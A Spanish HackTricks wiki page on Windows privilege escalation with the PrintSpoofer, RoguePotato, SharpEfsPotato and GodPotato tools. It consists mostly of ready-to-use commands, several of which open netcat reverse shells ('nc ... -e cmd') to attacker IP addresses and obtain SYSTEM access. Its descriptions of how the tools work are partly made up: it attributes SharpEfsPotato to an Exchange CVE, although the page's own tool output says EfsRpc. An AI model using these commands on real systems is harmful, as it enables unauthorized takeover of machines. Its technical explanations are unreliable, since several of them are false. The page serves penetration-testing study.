hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
• Descubre The PEASS Family, nuestra colección exclusiva de NFTs
• Obtén el swag oficial de PEASS y HackTricks
• Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
• Comparte tus trucos de hacking enviando PR al repositorio de hacktricks y al repositorio de hacktricks-cloud.

{% hint style="warning" %} JuicyPotato no funciona en Windows Server 2019 y en Windows 10 build 1809 en adelante. Sin embargo, se pueden utilizar PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato para aprovechar los mismos privilegios y obtener acceso de nivel NT AUTHORITY\SYSTEM. Esta publicación de blog profundiza en la herramienta PrintSpoofer, que se puede utilizar para abusar de los privilegios de suplantación en hosts de Windows 10 y Server 2019 donde JuicyPotato ya no funciona. {% endhint %}

Demo rápida

PrintSpoofer

c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------   

[+] Found privilege: SeImpersonatePrivilege                                        

[+] Named pipe listening...                                                        

[+] CreateProcessAsUser() OK                                                       

NULL

RoguePotato

RoguePotato es una técnica de escalada de privilegios locales que aprovecha una vulnerabilidad en el servicio de Windows RPC. Esta técnica se basa en la explotación de la vulnerabilidad de PrintSpooler para obtener permisos de SYSTEM.

La técnica funciona de la siguiente manera:

1. El atacante crea un servidor SMB malicioso y lo configura para que se conecte automáticamente al iniciar sesión.
2. El atacante inicia sesión en la máquina de destino y ejecuta un comando que inicia una sesión de RPC con el servidor SMB malicioso.
3. El servidor SMB malicioso envía una respuesta manipulada que hace que la máquina de destino ejecute un comando arbitrario con permisos de SYSTEM.

Esta técnica es especialmente peligrosa porque no requiere que el atacante tenga permisos de administrador en la máquina de destino. Además, la vulnerabilidad de PrintSpooler se encuentra en todas las versiones de Windows, lo que significa que esta técnica es efectiva en una amplia gama de sistemas operativos Windows.

Para protegerse contra esta técnica, se recomienda deshabilitar el servicio de PrintSpooler si no es necesario para el funcionamiento del sistema. También se puede configurar una directiva de grupo para restringir el acceso al servicio de PrintSpooler.

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

SharpEfsPotato

SharpEfsPotato es una técnica de escalada de privilegios locales que aprovecha una vulnerabilidad en el servicio de Exchange para ejecutar comandos con privilegios de SYSTEM. Esta técnica es similar a la técnica RoguePotato, pero en lugar de aprovechar la vulnerabilidad PrintSpooler, aprovecha la vulnerabilidad Exchange Security Feature Bypass (CVE-2021-28482).

Para utilizar SharpEfsPotato, primero se debe obtener acceso a una cuenta de Exchange con permisos de escritura en el Active Directory. Luego, se debe crear un objeto de enlace de servicio en el Active Directory que apunte a un archivo ejecutable malicioso. Finalmente, se debe iniciar sesión en un sistema vulnerable con la cuenta de Exchange y ejecutar el comando "New-MailboxExportRequest" para activar el objeto de enlace de servicio y ejecutar el archivo ejecutable malicioso con privilegios de SYSTEM.

Es importante tener en cuenta que esta técnica solo funciona en sistemas que ejecutan una versión vulnerable de Exchange y que tienen permisos de escritura en el Active Directory.

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

GodPotato

GodPotato es una técnica de escalada de privilegios locales que aprovecha una vulnerabilidad en el servicio de Windows Task Scheduler. Esta técnica es similar a la técnica RoguePotato, pero en lugar de aprovechar la vulnerabilidad PrintSpooler, aprovecha una vulnerabilidad en el servicio Task Scheduler. Con GodPotato, un atacante puede ejecutar código con privilegios SYSTEM en un sistema comprometido.

GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
• Descubre The PEASS Family, nuestra colección exclusiva de NFTs
• Obtén la oficial PEASS & HackTricks swag
• Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
• Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.